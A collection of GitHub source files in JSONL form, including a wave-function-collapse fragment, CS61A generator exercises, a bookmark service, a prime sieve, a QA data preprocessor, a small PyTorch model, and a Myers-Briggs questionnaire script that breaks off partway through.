Board2d[SuperpositionTile], rules: CollapseRules):\n super().__init__(board)\n self.rules = rules\n\n def calculate_valid_superpositions(self, tile: BoardTile[SuperpositionTile]):\n ret = []\n\n if tile.left:\n ret += (self.rules.get_options(tile.tile.superpositions, 0, tile.left.tile.superpositions))\n if tile.up:\n ret += (self.rules.get_options(tile.tile.superpositions, 1, tile.up.tile.superpositions))\n if tile.right:\n ret += (self.rules.get_options(tile.tile.superpositions, 2, tile.right.tile.superpositions))\n if tile.down:\n ret += (self.rules.get_options(tile.tile.superpositions, 3, tile.down.tile.superpositions))\n\n return ret\n\n def collapse_tile(self, tile: BoardTile[SuperpositionTile]):\n if not tile.tile.collapsed:\n tile.tile.superpositions = {choice(self.calculate_valid_superpositions(tile))}\n\n def select_tile_to_collapse(self, tiles: set[BoardTile[SuperpositionTile]]) -> BoardTile[SuperpositionTile]:\n return tiles.pop()\n\n def reduce_tile(self, tile: BoardTile[SuperpositionTile]):\n before = tile.tile.superpositions\n tile.tile.superpositions = self.rules.collapse_around(tile)\n return before != tile.tile.superpositions\n\n\n__all__ = ['Collapse', 'CollapseRules', 'TileRules']\n","repo_name":"gresm/pygame-summer-2022","sub_path":"wfcollapse/wfc_old.py","file_name":"wfc_old.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20459952676","text":"def naturals():\n \"\"\"A generator function that yields the infinite sequence of natural\n numbers, starting at 1.\n\n >>> m = naturals()\n >>> type(m)\n \n >>> [next(m) for _ in range(10)]\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n \"\"\"\n i = 1\n while True:\n yield i\n i += 1\n\n\n\n\ndef hailstone(n):\n \"\"\"\n >>> for num in hailstone(10):\n ... print(num)\n ...\n 10\n 5\n 16\n 8\n 4\n 2\n 1\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n while n > 1:\n yield n\n if n % 2 == 0:\n n = n // 2\n else:\n n = n * 3 + 1\n yield 1","repo_name":"ykangli/cs61a-rep","sub_path":"lab07/lab07.py","file_name":"lab07.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30167936626","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom crestify.models import db, Bookmark, User, Tag\nfrom crestify.services import archive\n\n\ndef new(url, user_id, description=None, tags=None, title=None, added=None):\n new_bookmark = Bookmark()\n new_bookmark.main_url = url[:2000]\n if title is not None:\n new_bookmark.title = title[:1024]\n if description is not None:\n new_bookmark.description = description[:256]\n new_bookmark.user = user_id\n if added is None:\n new_bookmark.added_on = datetime.utcnow()\n else:\n try:\n datetime.datetime.utcfromtimestamp(added)\n new_bookmark.added_on = added # UNIX timestamp in seconds since epoch, only\n except ValueError:\n new_bookmark.added_on = datetime.utcnow()\n new_bookmark.deleted = False\n if tags is not None:\n tags = tags.split(',')\n new_bookmark.tags = tags\n for tag in tags:\n # If tag is present, increment counter by one, or create if not present\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n new_tag = Tag(text=tag, user=user_id)\n new_tag.count = 1\n db.session.add(new_tag)\n else:\n get_tag.count += 1\n db.session.add(new_bookmark)\n db.session.commit()\n # Send off for archiving\n archive.do_archives(new_bookmark)\n return new_bookmark\n\n\ndef delete(id, user_id):\n delete_bookmark = Bookmark.query.get(id)\n if delete_bookmark.user == user_id:\n delete_bookmark.deleted = True\n tags = delete_bookmark.tags\n # If tags are present, we'll want to decrement their counts here\n if tags and len(tags) > 0:\n for tag in tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if get_tag:\n get_tag.count -= 1\n db.session.commit()\n\n\ndef per_page(user_id, per_page):\n per_page_bookmarks = User.query.get(user_id)\n per_page_bookmarks.bookmarks_per_page = per_page\n db.session.commit()\n\n\ndef edit(id, user_id, title=None, description=None, tags=None):\n edit_bookmark = Bookmark.query.get(id)\n if title is not None:\n edit_bookmark.title = title[:1024]\n if description is not None:\n edit_bookmark.description = description[:256]\n if tags != \"\" or tags is not None:\n if type(tags) is unicode:\n ls1 = edit_bookmark.tags or []\n ls2 = tags.split(',') or []\n # Compute deltas between new and current tags\n added_tags = set(ls1 + ls2) - set(ls1)\n removed_tags = set(ls1 + ls2) - set(ls2)\n for tag in added_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n new_tag = Tag(text=tag, user=user_id)\n new_tag.count = 1\n db.session.add(new_tag)\n else:\n get_tag.count += 1\n for tag in removed_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n pass\n else:\n get_tag.count -= 1\n edit_bookmark.tags = ls2\n db.session.commit()\n\n\ndef api_edit(id, tags, user_id):\n edit_bookmark = Bookmark.query.get(id)\n ls1 = edit_bookmark.tags or []\n ls2 = tags\n added_tags = None\n removed_tags = None\n if tags != ['']:\n if ls1:\n added_tags = set(ls1 + ls2) - set(ls1)\n removed_tags = set(ls1 + ls2) - set(ls2)\n else:\n added_tags = set(ls2)\n if added_tags:\n for tag in added_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n new_tag = Tag(text=tag, user=user_id)\n new_tag.count = 1\n db.session.add(new_tag)\n else:\n get_tag.count += 1\n edit_bookmark.tags = ls2\n else:\n removed_tags = set(edit_bookmark.tags)\n edit_bookmark.tags = []\n if removed_tags:\n for tag in removed_tags:\n get_tag = Tag.query.filter_by(text=tag,\n user=user_id).first()\n if not get_tag:\n pass\n else:\n get_tag.count -= 1\n db.session.commit()\n","repo_name":"dhamaniasad/crestify","sub_path":"crestify/services/bookmark.py","file_name":"bookmark.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","stars":256,"dataset":"github-code","pt":"37"} +{"seq_id":"29105768540","text":"import math\ndef sieve_all_prime(n):\n sieve = [True]*(n+1)\n spf = [0]*(n+1)\n\n for i in range(n+1):\n spf[i] = i \n\n sieve[0]= False\n sieve[1] = False\n\n for i in range(2, int(math.sqrt(n))+1):\n if sieve[i]:\n for j in range(i*i, n+1, +i):\n if spf[j] == j:\n spf[j] = i\n sieve[j] = False\n print(len(spf))\n return spf\n\n\ndef solve(A):\n spf = sieve_all_prime(1000000)\n for i in range(len(A)):\n total = 1\n x = A[i]\n while x > 1:\n f = spf[x]\n count = 0\n while (x % f) == 0:\n count += 1\n x= (x // f)\n \n total *= (count+1)\n A[i] = total\n return A\n \n\nA = [2,3,4,5]\n# A = [72]\nprint(sieve_all_prime(10))\nprint(solve(A))","repo_name":"chithra-m/ds_code_snippets","sub_path":"course/count_of_divisors.py","file_name":"count_of_divisors.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35824560016","text":"import json\nimport os\nimport string\nimport sys\nfrom io import open\n\nfrom fol_preprocess import*\n\nprint(\"load train data file\")\nwith open('../../MedEX/Data/new_2hops/Final_2hops_MashQA_kg_train_data.json','r') as f:\n mash_train_data=json.load(f)\n\n\ntrain_data=[]\n\nfor item,val in enumerate(mash_train_data):\n\tprint(\"context no: \",item)\n\tqq=[]\n\tfor qa in mash_train_data[item][\"qas\"]:\n\t\tanswers=[]\n\t\tanswers.append({\"text\":qa[\"answers\"][0][\"text\"], \"answer_start\":qa[\"answers\"][0][\"answer_start\"]})\n\t\tquestion_text =qa[\"question\"]\n\t\tr1,r2,r3,r4,r5,r6 = apply_rules_to_kg(qa['kg_triplets'])\n\t\tq = {\n\t\t\t\"id\":qa[\"id\"],\n\t\t\t\"is_impossible\": qa[\"is_impossible\"],\n\t\t\t\"question\": qa[\"question\"],\n\t\t\t\"kg_triplets\": qa['kg_triplets'],\n\t\t\t\"rule_1\": r1,\n\t\t\t\"rule_2\": r2,\n\t\t\t\"rule_3\": r3,\n\t\t\t\"rule_4\": r4,\n\t\t\t\"rule_5\": r5,\n\t\t\t\"rule_6\": r6,\n\t\t\t\"answers\": answers\n\t\t}\n\t\tqq.append(q)\n\ttrain ={\n\t\t\t\"context\":mash_train_data[item][\"context\"],\n\t\t\t\"qas\":qq\n\t}\n\ttrain_data.append(train)\n\nfile_name='../Data/2_hops/Final_2hops_MashQA_kg_train_data_with_rule.json'\nprint(file_name)\nwith open(file_name, 'w') as fp:\n\tjson.dump(train_data, fp, indent=4)\n\n\n","repo_name":"aizanzafar/MedEx","sub_path":"code/ExtractiveQA/Preprocess/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40664201045","text":"import torch.nn as nn\n\n\nclass LemonsNet(nn.Module):\n def __init__(self):\n super(LemonsNet, self).__init__()\n self.l1 = nn.Linear(14, 512)\n self.l2 = nn.Linear(512, 128)\n self.l3 = nn.Linear(128, 64)\n self.l_out = nn.Linear(64, 1)\n\n self.relu = nn.ReLU()\n self.dropout = nn.Dropout(p=0.1)\n self.bn1 = nn.BatchNorm1d(512)\n self.bn2 = nn.BatchNorm1d(128)\n self.bn3 = nn.BatchNorm1d(64)\n\n def forward(self, x):\n x = self.relu(self.l1(x))\n x = self.bn1(x)\n x = self.relu(self.l2(x))\n x = self.bn2(x)\n x = self.dropout(x)\n x = self.relu(self.l3(x))\n x = self.bn3(x)\n x = self.dropout(x)\n\n out = self.l_out(x)\n\n return out\n","repo_name":"BahaNordi/LemonsDetection","sub_path":"lemons_net.py","file_name":"lemons_net.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18388593497","text":"import os, shutil\nimport subprocess\ndef preprocessing():\n src = \"images\"\n dst = \"processed\"\n\n # clear output dir\n if os.path.isdir(dst):\n for filename in os.listdir(dst):\n file_path = os.path.join(dst, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n \n # process all input images\n for root, dirs, files in os.walk(src):\n for file in files:\n if (root != \"images/gridded\"): continue\n if file.endswith(\".jpg\") or file.endswith(\".png\"):\n subprocess.run([\"python3\", \"main.py\", \"-i\", os.path.join(root, file)])\n\ndef main():\n preprocessing()\n\nif __name__ == \"__main__\":\n main()","repo_name":"tommy2022/TableRecognition","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25092632929","text":"# setup.py\nfrom distutils.core import setup, Extension\n\nimport numpy\n\ntry:\n numpy_include = numpy.get_include()\nexcept AttributeError:\n numpy_include = numpy.get_numpy_include()\n\n \n# c3 = Extension('_c3',\n# ['c3.i'],\n# include_dirs = [\n# numpy_include,\n# '../../include',\n# '../../src/lib_array',\n# '../../src/lib_clinalg',\n# '../../src/lib_funcs',\n# '../../src/lib_optimization',\n# '../../src/lib_linalg',\n# '../../src/lib_probability',\n# '../../src/lib_quadrature',\n# '../../src/lib_stringmanip',\n# '../../src/lib_superlearn',\n# '../../src/lib_interface',\n# ],\n# define_macros =[('COMPILE_WITH_PYTHON',None)],\n# undef_macros = [],\n# language='c',\n# runtime_library_dirs=['../../build/src'],\n# library_dirs = ['../../build/src'],\n# # extra_link_args=['-Wl,-R/Users/aagorod/Software/c3/build/src'],\n# # library_dirs = ['/Users/aagorod/Software/c3/lib'],\n# libraries = ['c3'],\n# extra_compile_args = ['-std=c99'],\n# )\n\npcback = Extension('pycback',\n sources = ['python_caller.c'],\n include_dirs = [\n numpy_include,\n ],\n language='c',\n extra_compile_args=['-std=c99'])\n\n\nsetup(\n name = \"c3\",\n version = \"1.0\",\n # ext_modules=[c3,pcback]\n ext_modules=[pcback]\n)\n\n# ~/Software/c3_installed/lib/c3/\n","repo_name":"stellarscience/dakota-stellar","sub_path":"packages/external/C3/wrappers/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9807229881","text":"#!/usr/bin/python3\r\n# Project Name: Insights\r\n# Author: Andrew Eng\r\n# Original Creation Date: 2020-09-20\r\n# Summary: This is the Myers Briggs Personality Test. This initial code base is taken from the MBTI Self Scorable Form by Katharine C. Briggs and Isabel Briggs Myers. \r\n\r\n# Version Control\r\n\r\ne = 0\r\ns = 0\r\nt = 0\r\nj = 0\r\ni = 0\r\nn = 0\r\nf = 0\r\np = 0\r\nresponse = \"\"\r\nquestions = \"\"\r\npreference = []\r\n\r\n# Evaluate J and P\r\ndef eval(evaluation, response, question):\r\n\t# Questions Part 1: 1, 10, 20, 9\r\n\t# Questions Part 2: 28, 36, 43, 49\r\n\t# Questions Part 3: 59, 70, 58\r\n\tglobal e, s, t, j, i, n, f, p\r\n\r\n\tdef invalid():\r\n\t\tprint(\"##########################################\")\r\n\t\tprint(\"\\n>>>> Invalid Response, try again: <<<<\\n\")\r\n\t\tprint(\"##########################################\")\r\n\t\tresponse = input(question)\r\n\t\teval(evaluation, response.lower(), question)\r\n\r\n\tif evaluation == \"jp\":\r\n\t\tif response == \"a\":\r\n\t\t\tj = j+1\r\n\t\t\treturn j\r\n\t\tif response == \"b\":\r\n\t\t\tp = p+1\r\n\t\t\treturn p\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"pj\":\r\n\t\tif response == \"a\":\r\n\t\t\tp = p+1\r\n\t\t\treturn p\r\n\t\tif response == \"b\":\r\n\t\t\tj = j+1\r\n\t\t\treturn j\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ie\":\r\n\t\tif response == \"a\":\r\n\t\t\ti = i+1\r\n\t\t\treturn i\r\n\t\tif response == \"b\":\r\n\t\t\te = e+1\r\n\t\t\treturn e\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ei\":\r\n\t\tif response == \"a\":\r\n\t\t\te = e+1\r\n\t\t\treturn e\r\n\t\tif response == \"b\":\r\n\t\t\ti = i+1\r\n\t\t\treturn i\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"sn\":\r\n\t\tif response == \"a\":\r\n\t\t\ts = s+1\r\n\t\t\treturn s\r\n\t\tif response == \"b\":\r\n\t\t\tn = n+1\r\n\t\t\treturn n\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ns\":\r\n\t\tif response == \"a\":\r\n\t\t\tn = n+1\r\n\t\t\treturn n\r\n\t\tif response == \"b\":\r\n\t\t\ts = s+1\r\n\t\t\treturn s\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"ft\":\r\n\t\tif response == \"a\":\r\n\t\t\tf = f+1\r\n\t\t\treturn f\r\n\t\tif response == \"b\":\r\n\t\t\tt = t+1\r\n\t\t\treturn t\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\n\tif evaluation == \"tf\":\r\n\t\tif response == \"a\":\r\n\t\t\tt = t+1\r\n\t\t\treturn t\r\n\t\tif response == \"b\":\r\n\t\t\tf = f+1\r\n\t\t\treturn f\r\n\t\telse:\r\n\t\t\tinvalid()\r\n\r\ndef part1():\r\n\tprint(\"\\n###############################################################################\")\r\n\tprint(\"#### Which answer comes closest to describing how you usually feel or act? ####\")\r\n\tprint(\"###############################################################################\")\r\n\r\ndef part2():\r\n\tprint(\"\\n###################################################################################################################################\")\r\n\tprint(\"#### Which word in each pair appeals to you more? Think about what the words mean, not about how they look or how they sound. ####\")\r\n\tprint(\"###################################################################################################################################\")\r\n\r\ndef part3():\r\n\tprint(\"\\n###############################################################################\")\r\n\tprint(\"#### Which answer comes closest to describing how you usually feel or act? ####\")\r\n\tprint(\"###############################################################################\")\r\n\r\ndef part4(): \r\n\tprint(\"\\n###################################################################################################################################\")\r\n\tprint(\"#### Which word in each pair appeals to you more? Think about what the words mean, not about how they look or how they sound. ####\")\r\n\tprint(\"###################################################################################################################################\")\r\n\r\ndef execute(que_no, question, answer_a, answer_b, mb):\r\n\trequest = f\"\\n{que_no}. {question} {answer_a}\\n {answer_b}\\n Input: \"\r\n\tresponse = input(request)\r\n\teval(mb, response.lower(), request)\r\n\r\npart1()\r\nque_no = 1\r\nanswer_a = \" [a] plan what you do and when\"\r\nanswer_b = \" [b] just go?\"\r\nquestion = \"When you go somewhere for the day, would you rather\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 2\r\nanswer_a = \" [a] more of a spontaneous person\"\r\nanswer_b = \" [b] more of an organized person?\"\r\nquestion = \"Do you consider yourself to be\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 3\r\nanswer_a = \" [a] fact Courses\"\r\nanswer_b = \" [b] courses involving theory?\"\r\nquestion = \"If you were a teacher, would you rather teach\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 4\r\nanswer_a = \" [a] a good mixer\"\r\nanswer_b = \" [b] rather quiet and reserved?\"\r\nquestion = \"Are you usually\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 5\r\nanswer_a = \" [a] imaginative people\"\r\nanswer_b = \" [b] realistic people\"\r\nquestion = \"Do you usually get along better with\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 6\r\nanswer_a = \" [a] your heart rules your head\"\r\nanswer_b = \" [b] your head rules your heart\"\r\nquestion = \"Do you more often let\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 7\r\nanswer_a = \" [a] on the spur of the moment\"\r\nanswer_b = \" [b] according to your plans\"\r\nquestion = \"Do you prefer to do many things\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 8\r\nanswer_a = \" [a] easy to get to know\"\r\nanswer_b = \" [b] hard to get to know\"\r\nquestion = \"Are you\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 9\r\nanswer_a = \" [a] appeal to you\"\r\nanswer_b = \" [b] cramp you?\"\r\nquestion = \"Does following a schedule\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 10\r\nanswer_a = \" [a] organize it carefully before you start\"\r\nanswer_b = \" [b] find out what is necessary as you go along\"\r\nquestion = \"When you have a special job to do, do you like to\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 11\r\nanswer_a = \" [a] go with the flow\"\r\nanswer_b = \" [b] follow a schedule?\"\r\nquestion = \"In most instances, do you prefer to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 12\r\nanswer_a = \" [a] private person\"\r\nanswer_b = \" [b] a very open person?\"\r\nquestion = \"Would most people say you are\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 13\r\nanswer_a = \" [a] a practical person\"\r\nanswer_b = \" [b] an ingenious person?\"\r\nquestion = \"Would you rather be considered\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 14\r\nanswer_a = \" [a] introduce others\"\r\nanswer_b = \" [b] get introduced?\"\r\nquestion = \"In a large group do you more often\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 15\r\nanswer_a = \" [a] is always coming up with new ideas\"\r\nanswer_b = \" [b] has both feet on the ground?\"\r\nquestion = \"Would you rather have as a friend someone who\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 16\r\nanswer_a = \" [a] value sentiment more than logic\"\r\nanswer_b = \" [b] value logic more than sentiment?\"\r\nquestion = \"Are you inclined to\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 17\r\nanswer_a = \" [a] wait and see what happens and then make plans\"\r\nanswer_b = \" [b] plan things far in advance?\"\r\nquestion = \"Do you prefer to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 18\r\nanswer_a = \" [a] by yourself\"\r\nanswer_b = \" [b] with others?\"\r\nquestion = \"Do you tend to spend a lot of time\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 19\r\nanswer_a = \" [a] gives you more energy\"\r\nanswer_b = \" [b] is often draining?\"\r\nquestion = \"Do you find being around a lot of people\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 20\r\nanswer_a = \" [a] arrange dates, parties, etc, well in advance\"\r\nanswer_b = \" [b] be free to do whatver looks like fun when the time comes?\"\r\nquestion = \"Do you prefer to\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 21\r\nanswer_a = \" [a] most of the time do whatever you feel like that day\"\r\nanswer_b = \" [b] know ahead of time what you'll be doing most days?\"\r\nquestion = \"In planning a trip would you prefer to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 22\r\nanswer_a = \" [a] sometimes get bored\"\r\nanswer_b = \" [b] always have fun?\"\r\nquestion = \"At parties, do you\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 23\r\nanswer_a = \" [a] mingle well with others\"\r\nanswer_b = \" [b] tend to keep more to yourself?\"\r\nquestion = \"Do you usually\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 24\r\nanswer_a = \" [a] a person with a quicksand brilliant mind\"\r\nanswer_b = \" [b] a practical person with a lot of common sense?\"\r\nquestion = \"Are you more attracted to\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 25\r\nanswer_a = \" [a] rather enjoy an emergency that makes you work against time\"\r\nanswer_b = \" [b] usually plan your work so you won't need to work under pressure?\"\r\nquestion = \"In your daily work, do you\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart1()\r\nque_no = 26\r\nanswer_a = \" [a] a lot of time to get to know you\"\r\nanswer_b = \" [b] a little time to get to know you\"\r\nquestion = \"Would you say it generally takes others\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\npart2()\r\nque_no = 27\r\nanswer_a = \" [a] Private\"\r\nanswer_b = \" [b] Open\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\n# I started flipping que_no and the parts(), found it easier this way... c\r\n# Clean up the above code\r\n\r\nque_no = 28\r\npart2()\r\nanswer_a = \" [a] Scheduled\"\r\nanswer_b = \" [b] Unplanned\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 29\r\npart2()\r\nanswer_a = \" [a] Abstract\"\r\nanswer_b = \" [b] Solid\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 30\r\npart2()\r\nanswer_a = \" [a] Gentle\"\r\nanswer_b = \" [b] Firm\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 31\r\npart2()\r\nanswer_a = \" [a] Thinking\"\r\nanswer_b = \" [b] Feeling\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 32\r\npart2()\r\nanswer_a = \" [a] Facts\"\r\nanswer_b = \" [b] Ideas\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 33\r\npart2()\r\nanswer_a = \" [a] Impulse\"\r\nanswer_b = \" [b] Decision\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 34\r\npart2()\r\nanswer_a = \" [a] Hearty\"\r\nanswer_b = \" [b] Quiet\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 35\r\npart2()\r\nanswer_a = \" [a] Quiet\"\r\nanswer_b = \" [b] Outgoing\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 36\r\npart2()\r\nanswer_a = \" [a] Systematic\"\r\nanswer_b = \" [b] Casual\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 37\r\npart2()\r\nanswer_a = \" [a] Theory\"\r\nanswer_b = \" [b] Certainty\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 38\r\npart2()\r\nanswer_a = \" [a] Sensitive\"\r\nanswer_b = \" [b] Just\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 39\r\npart2()\r\nanswer_a = \" [a] Convincing\"\r\nanswer_b = \" [b] Touching\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 40\r\npart2()\r\nanswer_a = \" [a] Statement\"\r\nanswer_b = \" [b] Concept\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 41\r\npart2()\r\nanswer_a = \" [a] Unconstrained\"\r\nanswer_b = \" [b] Scheduled\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 42\r\npart2()\r\nanswer_a = \" [a] Reserved\"\r\nanswer_b = \" [b] Talkative\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 43\r\npart2()\r\nanswer_a = \" [a] Orderly\"\r\nanswer_b = \" [b] Easygoing\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 44\r\npart2()\r\nanswer_a = \" [a] Idea\"\r\nanswer_b = \" [b] Actuality\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 45\r\npart2()\r\nanswer_a = \" [a] Compassion\"\r\nanswer_b = \" [b] Foresight\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 46\r\npart2()\r\nanswer_a = \" [a] Benefits\"\r\nanswer_b = \" [b] Blessings\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 47\r\npart2()\r\nanswer_a = \" [a] No-nonsense\"\r\nanswer_b = \" [b] Theoretical\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 48\r\npart2()\r\nanswer_a = \" [a] Few Friends\"\r\nanswer_b = \" [b] Lots of Friends\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 49\r\npart2()\r\nanswer_a = \" [a] Systematic\"\r\nanswer_b = \" [b] Spontaneous\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 50\r\npart2()\r\nanswer_a = \" [a] Imaginative\"\r\nanswer_b = \" [b] Matter-of-fact\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 51\r\npart2()\r\nanswer_a = \" [a] Warm\"\r\nanswer_b = \" [b] Objective\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, 